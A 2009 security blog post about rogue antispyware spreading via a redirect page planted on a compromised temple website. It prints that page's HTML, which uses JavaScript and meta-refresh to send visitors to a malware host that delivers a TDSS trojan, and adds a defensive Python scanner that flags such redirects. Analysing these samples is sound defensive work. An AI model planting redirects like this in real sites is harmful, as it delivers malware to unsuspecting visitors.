Saturday, October 31, 2009

More Rogue from Genuine Site

Rogue antispyware has become the most common infection these days. The way it spreads has varied from fake codecs to links to a genuine site, where a page on that site redirects to the malicious site.

In our case it was a mail sent from a hacked Yahoo account with a link to a Hindu temple site.

hxxp://www.shrikhatushyamji.com/Wvse2KU8VD.html

This page contains the malicious redirect:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>CONGRATULATIONS</title>
<script language="JavaScript1.1" type="text/javascript">
<!--
location.replace("http://vivilan.cn");
//-->
</script>
<noscript>
<meta http-equiv="Refresh" content="0; URL=http://vivilan.cn">
</noscript>
</head>
<body>
<a href="http://vivilan.cn">Click here...</a>
</body>
</html>
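As an added example (not from the original post), a small Python scanner that pulls every immediate redirect target out of a page like the one above, whether it fires through the JavaScript path or the noscript meta-refresh fallback, and flags the ones that leave the hosting domain. The captured HTML is embedded as the sample input; the hosting page URL passed in is an assumption.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Immediate client-side redirects: location.replace("..."), location.href = "...",
# window.location = "..." (the captured page uses the first form).
JS_REDIRECT = re.compile(
    r"""(?:window\.)?location(?:\.href)?\s*(?:=|\.replace\s*\()\s*["']([^"']+)["']""",
    re.IGNORECASE)
# <meta http-equiv="refresh" content="0; URL=..."> -> (delay, target)
META_REFRESH = re.compile(r"""^\s*(\d+)\s*;\s*url\s*=\s*["']?([^"'\s]+)""", re.IGNORECASE)


class RedirectScanner(HTMLParser):
    """Collects every redirect target a page declares, whichever path the browser takes."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.found = []  # list of (method, target_url)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self.in_script = True
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = META_REFRESH.match(a.get("content") or "")
            if m:
                self.found.append((f"meta-refresh({m.group(1)}s)", m.group(2)))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            for url in JS_REDIRECT.findall(data):
                self.found.append(("javascript", url))

    def handle_comment(self, data):
        # Old-style <!-- --> hiding inside <script> (as in the captured page) must still be scanned.
        if self.in_script:
            self.handle_data(data)


def offsite_redirects(html, page_url):
    """Return the redirects that leave the host the page was served from."""
    scanner = RedirectScanner()
    scanner.feed(html)
    page_host = urlparse(page_url).hostname
    return [(m, u) for m, u in scanner.found if urlparse(u).hostname not in (None, page_host)]


# The captured page from the compromised site, embedded here as sample input.
SAMPLE_PAGE = """<html><head><title>CONGRATULATIONS</title>
<script language="JavaScript1.1" type="text/javascript">
<!--
location.replace("http://vivilan.cn");
//-->
</script>
<noscript><meta http-equiv="Refresh" content="0; URL=http://vivilan.cn"></noscript>
</head><body><a href="http://vivilan.cn">Click here...</a></body></html>"""

if __name__ == "__main__":
    # Hosting URL is assumed; only the path on the page above is real.
    for method, target in offsite_redirects(SAMPLE_PAGE, "http://www.shrikhatushyamji.com/Wvse2KU8VD.html"):
        print(f"{method:18s} -> {target}")
```

Both branches resolve to the same off-site host, which is the signature of a redirect page dropped onto a legitimate site rather than of a same-site navigation.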

From this site it downloads Surprise.exe (Trojan.TDSS).

This installs rogue antispyware as its payload.


